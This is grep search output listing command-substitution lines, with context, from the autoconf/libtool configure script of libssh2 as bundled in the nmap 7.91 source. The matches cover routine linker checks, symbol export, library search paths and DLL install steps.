nmap-7.91+dfsg1/libssh2/configure-10824-    sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)
nmap-7.91+dfsg1/libssh2/configure:10825:      case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-10826-        *\ [01].* | *\ 2.[0-9].* | *\ 2.1[0-5].*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-10913-	else
nmap-7.91+dfsg1/libssh2/configure:10914:	  export_symbols_cmds='`func_echo_all $NM | $SED -e '\''s/B\([^B]*\)$/P\1/'\''` -PCpgl $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) && (substr(\$ 1,1,1) != ".")) { if ((\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) { print \$ 1 " weak" } else { print \$ 1 } } }'\'' | sort -u > $export_symbols'
nmap-7.91+dfsg1/libssh2/configure-10915-	fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-10978-	# below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libssh2/configure:10979:	  collect2name=`$CC -print-prog-name=collect2`
nmap-7.91+dfsg1/libssh2/configure-10980-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libssh2/configure-11058-      }'
nmap-7.91+dfsg1/libssh2/configure:11059:  lt_cv_aix_libpath_=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/configure-11060-  # Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libssh2/configure-11061-  if test -z "$lt_cv_aix_libpath_"; then
nmap-7.91+dfsg1/libssh2/configure:11062:    lt_cv_aix_libpath_=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/configure-11063-  fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-11076-        hardcode_libdir_flag_spec='$wl-blibpath:$libdir:'"$aix_libpath"
nmap-7.91+dfsg1/libssh2/configure:11077:        archive_expsym_cmds='$CC -o $output_objdir/$soname $libobjs $deplibs $wl'$no_entry_flag' $compiler_flags `if test -n "$allow_undefined_flag"; then func_echo_all "$wl$allow_undefined_flag"; else :; fi` $wl'$exp_sym_flag:\$export_symbols' '$shared_flag
nmap-7.91+dfsg1/libssh2/configure-11078-      else
##############################################
nmap-7.91+dfsg1/libssh2/configure-11111-      }'
nmap-7.91+dfsg1/libssh2/configure:11112:  lt_cv_aix_libpath_=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/configure-11113-  # Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libssh2/configure-11114-  if test -z "$lt_cv_aix_libpath_"; then
nmap-7.91+dfsg1/libssh2/configure:11115:    lt_cv_aix_libpath_=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/configure-11116-  fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-11143-	  # -brtl affects multiple linker settings, -berok does not and is overridden later
nmap-7.91+dfsg1/libssh2/configure:11144:	  compiler_flags_filtered='`func_echo_all "$compiler_flags " | $SED -e "s%-brtl\\([, ]\\)%-berok\\1%g"`'
nmap-7.91+dfsg1/libssh2/configure-11145-	  if test svr4 != "$with_aix_soname"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-11196-	archive_cmds='$CC -o $output_objdir/$soname $libobjs $compiler_flags $deplibs -Wl,-DLL,-IMPLIB:"$tool_output_objdir$libname.dll.lib"~linknames='
nmap-7.91+dfsg1/libssh2/configure:11197:	archive_expsym_cmds='if   test DEF = "`$SED -n     -e '\''s/^[	 ]*//'\''     -e '\''/^\(;.*\)*$/d'\''     -e '\''s/^\(EXPORTS\|LIBRARY\)\([	 ].*\)*$/DEF/p'\''     -e q     $export_symbols`" ; then
nmap-7.91+dfsg1/libssh2/configure-11198-            cp "$export_symbols" "$output_objdir/$soname.def";
##############################################
nmap-7.91+dfsg1/libssh2/configure-11234-	# FIXME: Setting linknames here is a bad hack.
nmap-7.91+dfsg1/libssh2/configure:11235:	archive_cmds='$CC -o $lib $libobjs $compiler_flags `func_echo_all "$deplibs" | $SED '\''s/ -lc$//'\''` -link -dll~linknames='
nmap-7.91+dfsg1/libssh2/configure-11236-	# The linker will automatically build a .lib file if we build a DLL.
##############################################
nmap-7.91+dfsg1/libssh2/configure-11252-  if test yes = "$lt_cv_ld_force_load"; then
nmap-7.91+dfsg1/libssh2/configure:11253:    whole_archive_flag_spec='`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience $wl-force_load,$conv\"; done; func_echo_all \"$new_convenience\"`'
nmap-7.91+dfsg1/libssh2/configure-11254-
##############################################
nmap-7.91+dfsg1/libssh2/configure-11432-      if test yes = "$GCC"; then
nmap-7.91+dfsg1/libssh2/configure:11433:	archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11434-	# Try to use the -exported_symbol ld option, if it does not
##############################################
nmap-7.91+dfsg1/libssh2/configure-11460-	if test yes = "$lt_cv_irix_exported_symbol"; then
nmap-7.91+dfsg1/libssh2/configure:11461:          archive_expsym_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations $wl-exports_file $wl$export_symbols -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11462-	fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-11464-      else
nmap-7.91+dfsg1/libssh2/configure:11465:	archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure:11466:	archive_expsym_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -exports_file $export_symbols -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11467-      fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-11511-	hardcode_direct_absolute=yes
nmap-7.91+dfsg1/libssh2/configure:11512:	if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/configure-11513-	  archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags'
##############################################
nmap-7.91+dfsg1/libssh2/configure-11542-	prefix_cmds="$SED"~
nmap-7.91+dfsg1/libssh2/configure:11543:	if test EXPORTS = "`$SED 1q $export_symbols`"; then
nmap-7.91+dfsg1/libssh2/configure-11544-	  prefix_cmds="$prefix_cmds -e 1d";
##############################################
nmap-7.91+dfsg1/libssh2/configure-11556-	allow_undefined_flag=' $wl-expect_unresolved $wl\*'
nmap-7.91+dfsg1/libssh2/configure:11557:	archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11558-      else
nmap-7.91+dfsg1/libssh2/configure-11559-	allow_undefined_flag=' -expect_unresolved \*'
nmap-7.91+dfsg1/libssh2/configure:11560:	archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11561-      fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-11569-	allow_undefined_flag=' $wl-expect_unresolved $wl\*'
nmap-7.91+dfsg1/libssh2/configure:11570:	archive_cmds='$CC -shared$allow_undefined_flag $pic_flag $libobjs $deplibs $compiler_flags $wl-msym $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure-11571-	hardcode_libdir_flag_spec='$wl-rpath $wl$libdir'
##############################################
nmap-7.91+dfsg1/libssh2/configure-11573-	allow_undefined_flag=' -expect_unresolved \*'
nmap-7.91+dfsg1/libssh2/configure:11574:	archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -msym -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/configure:11575:	archive_expsym_cmds='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done; printf "%s\\n" "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libssh2/configure:11576:          $CC -shared$allow_undefined_flag $wl-input $wl$lib.exp $compiler_flags $libobjs $deplibs -soname $soname `test -n "$verstring" && $ECHO "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib~$RM $lib.exp'
nmap-7.91+dfsg1/libssh2/configure-11577-
##############################################
nmap-7.91+dfsg1/libssh2/configure-11592-      else
nmap-7.91+dfsg1/libssh2/configure:11593:	case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libssh2/configure-11594-	*"Compilers 5.0"*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-11991-  esac
nmap-7.91+dfsg1/libssh2/configure:11992:  lt_search_path_spec=`$CC -print-search-dirs | awk $lt_awk_arg | $SED -e "s/^libraries://" -e $lt_sed_strip_eq`
nmap-7.91+dfsg1/libssh2/configure-11993-  case $lt_search_path_spec in
##############################################
nmap-7.91+dfsg1/libssh2/configure-11998-    # okay in the real world where ";" in dirpaths is itself problematic.
nmap-7.91+dfsg1/libssh2/configure:11999:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED 's/;/ /g'`
nmap-7.91+dfsg1/libssh2/configure-12000-    ;;
nmap-7.91+dfsg1/libssh2/configure-12001-  *)
nmap-7.91+dfsg1/libssh2/configure:12002:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/configure-12003-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12007-  lt_tmp_lt_search_path_spec=
nmap-7.91+dfsg1/libssh2/configure:12008:  lt_multi_os_dir=/`$CC $CPPFLAGS $CFLAGS $LDFLAGS -print-multi-os-directory 2>/dev/null`
nmap-7.91+dfsg1/libssh2/configure-12009-  # ...but if some path component already ends with the multilib dir we assume
##############################################
nmap-7.91+dfsg1/libssh2/configure-12049-  esac
nmap-7.91+dfsg1/libssh2/configure:12050:  sys_lib_search_path_spec=`$ECHO "$lt_search_path_spec" | $lt_NL2SP`
nmap-7.91+dfsg1/libssh2/configure-12051-else
##############################################
nmap-7.91+dfsg1/libssh2/configure-12189-    # Create ${libname}_ixlibrary.a entries in /sys/libs.
nmap-7.91+dfsg1/libssh2/configure:12190:    finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`func_echo_all "$lib" | $SED '\''s%^.*/\([^/]*\)\.ixlibrary$%\1%'\''`; $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done'
nmap-7.91+dfsg1/libssh2/configure-12191-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12225-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libssh2/configure:12226:    postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/configure:12227:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure:12228:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/configure-12229-      test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libssh2/configure-12234-      fi'
nmap-7.91+dfsg1/libssh2/configure:12235:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure-12236-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/configure-12242-      # Cygwin DLLs use 'cyg' prefix rather than 'lib'
nmap-7.91+dfsg1/libssh2/configure:12243:      soname_spec='`echo $libname | sed -e 's/^lib/cyg/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/configure-12244-
##############################################
nmap-7.91+dfsg1/libssh2/configure-12248-      # MinGW DLLs use traditional 'lib' prefix
nmap-7.91+dfsg1/libssh2/configure:12249:      soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/configure-12250-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12252-      # pw32 DLLs use 'pw' prefix rather than 'lib'
nmap-7.91+dfsg1/libssh2/configure:12253:      library_names_spec='`echo $libname | sed -e 's/^lib/pw/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/configure-12254-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12261-    libname_spec='$name'
nmap-7.91+dfsg1/libssh2/configure:12262:    soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/configure-12263-    library_names_spec='$libname.dll.lib'
##############################################
nmap-7.91+dfsg1/libssh2/configure-12273-        # Let DOS variable expansion print the short 8.3 style file name.
nmap-7.91+dfsg1/libssh2/configure:12274:        lt_path=`cd "$lt_path" 2>/dev/null && cmd //C "for %i in (".") do @echo %~si"`
nmap-7.91+dfsg1/libssh2/configure-12275-        sys_lib_search_path_spec="$sys_lib_search_path_spec $lt_path"
##############################################
nmap-7.91+dfsg1/libssh2/configure-12278-      # Convert to MSYS style.
nmap-7.91+dfsg1/libssh2/configure:12279:      sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | sed -e 's|\\\\|/|g' -e 's| \\([a-zA-Z]\\):| /\\1|g' -e 's|^ ||'`
nmap-7.91+dfsg1/libssh2/configure-12280-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12284-      # like /cygdrive/c/PROGRA~1:/cygdr...
nmap-7.91+dfsg1/libssh2/configure:12285:      sys_lib_search_path_spec=`cygpath --path --unix "$LIB"`
nmap-7.91+dfsg1/libssh2/configure:12286:      sys_lib_search_path_spec=`cygpath --path --dos "$sys_lib_search_path_spec" 2>/dev/null`
nmap-7.91+dfsg1/libssh2/configure:12287:      sys_lib_search_path_spec=`cygpath --path --unix "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/configure-12288-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-12292-        # It is most probably a Windows format PATH.
nmap-7.91+dfsg1/libssh2/configure:12293:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libssh2/configure-12294-      else
nmap-7.91+dfsg1/libssh2/configure:12295:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/configure-12296-      fi
##############################################
nmap-7.91+dfsg1/libssh2/configure-12302-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libssh2/configure:12303:    postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/configure:12304:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure:12305:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/configure-12306-      test -d \$dldir || mkdir -p \$dldir~
nmap-7.91+dfsg1/libssh2/configure-12307-      $install_prog $dir/$dlname \$dldir/$dlname'
nmap-7.91+dfsg1/libssh2/configure:12308:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure-12309-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/configure-12316-    # Assume MSVC wrapper
nmap-7.91+dfsg1/libssh2/configure:12317:    library_names_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext $libname.lib'
nmap-7.91+dfsg1/libssh2/configure-12318-    dynamic_linker='Win32 ld.exe'
##############################################
nmap-7.91+dfsg1/libssh2/configure-12333-  shlibpath_var=DYLD_LIBRARY_PATH
nmap-7.91+dfsg1/libssh2/configure:12334:  shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'
nmap-7.91+dfsg1/libssh2/configure-12335-
##############################################
nmap-7.91+dfsg1/libssh2/configure-12586-  if test -f /etc/ld.so.conf; then
nmap-7.91+dfsg1/libssh2/configure:12587:    lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \$2)); skip = 1; } { if (!skip) print \$0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[	 ]*hwcap[	 ]/d;s/[:,	]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;s/"//g;/^$/d' | tr '\n' ' '`
nmap-7.91+dfsg1/libssh2/configure-12588-    sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra"
##############################################
nmap-7.91+dfsg1/libssh2/configure-12652-  need_lib_prefix=no
nmap-7.91+dfsg1/libssh2/configure:12653:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/configure-12654-    need_version=no
##############################################
nmap-7.91+dfsg1/libssh2/configure-12679-  sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec
nmap-7.91+dfsg1/libssh2/configure:12680:  postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/configure:12681:    dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; $ECHO \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure:12682:    dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/configure-12683-    test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libssh2/configure-12688-    fi'
nmap-7.91+dfsg1/libssh2/configure:12689:  postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; $ECHO \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/configure-12690-    dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/configure-14113-    # gcc leaves a trailing carriage return which upsets mingw
nmap-7.91+dfsg1/libssh2/configure:14114:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libssh2/configure-14115-  *)
nmap-7.91+dfsg1/libssh2/configure:14116:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libssh2/configure-14117-  esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-14122-      # Canonicalize the path of ld
nmap-7.91+dfsg1/libssh2/configure:14123:      ac_prog=`echo $ac_prog| sed 's%\\\\%/%g'`
nmap-7.91+dfsg1/libssh2/configure-14124-      while echo $ac_prog | grep "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libssh2/configure:14125:	ac_prog=`echo $ac_prog| sed "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libssh2/configure-14126-      done
##############################################
nmap-7.91+dfsg1/libssh2/configure-14156-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libssh2/configure:14157:      case `"$acl_cv_path_LD" -v 2>&1 < /dev/null` in
nmap-7.91+dfsg1/libssh2/configure-14158-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-14185-  # I'd rather use --version here, but apparently some GNU ld's only accept -v.
nmap-7.91+dfsg1/libssh2/configure:14186:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/configure-14187-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/configure-14233-                  acl_libdirstem=lib
nmap-7.91+dfsg1/libssh2/configure:14234:  searchpath=`(LC_ALL=C $CC -print-search-dirs) 2>/dev/null | sed -n -e 's,^libraries: ,,p' | sed -e 's,^=,,'`
nmap-7.91+dfsg1/libssh2/configure-14235-  if test -n "$searchpath"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-14240-          */lib64/ | */lib64 ) acl_libdirstem=lib64 ;;
nmap-7.91+dfsg1/libssh2/configure:14241:          *) searchdir=`cd "$searchdir" && pwd`
nmap-7.91+dfsg1/libssh2/configure-14242-             case "$searchdir" in
##############################################
nmap-7.91+dfsg1/libssh2/configure-14334-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:14335:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-14336-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-14410-                -L*)
nmap-7.91+dfsg1/libssh2/configure:14411:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-14412-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-14525-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:14526:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-14527-                LIBSSL_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-14574-                  -L*)
nmap-7.91+dfsg1/libssh2/configure:14575:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-14576-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-14631-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:14632:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-14633-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-14656-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:14657:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-14658-                    ;;
nmap-7.91+dfsg1/libssh2/configure-14659-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:14660:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-14661-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-14905-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:14906:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-14907-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-14981-                -L*)
nmap-7.91+dfsg1/libssh2/configure:14982:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-14983-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15096-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:15097:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-15098-                LIBGCRYPT_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-15145-                  -L*)
nmap-7.91+dfsg1/libssh2/configure:15146:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-15147-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15202-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:15203:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-15204-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15227-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:15228:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-15229-                    ;;
nmap-7.91+dfsg1/libssh2/configure-15230-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:15231:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-15232-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-15457-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:15458:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-15459-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-15533-                -L*)
nmap-7.91+dfsg1/libssh2/configure:15534:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-15535-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15648-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:15649:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-15650-                LIBMBEDCRYPTO_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-15697-                  -L*)
nmap-7.91+dfsg1/libssh2/configure:15698:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-15699-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15754-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:15755:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-15756-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-15779-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:15780:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-15781-                    ;;
nmap-7.91+dfsg1/libssh2/configure-15782-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:15783:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-15784-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-15933-do :
nmap-7.91+dfsg1/libssh2/configure:15934:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-15935-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "#include <windows.h>
##############################################
nmap-7.91+dfsg1/libssh2/configure-15938-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:15939:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-15940-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-16039-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:16040:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-16041-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-16115-                -L*)
nmap-7.91+dfsg1/libssh2/configure:16116:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-16117-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16230-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:16231:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-16232-                LIBCRYPT32_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-16279-                  -L*)
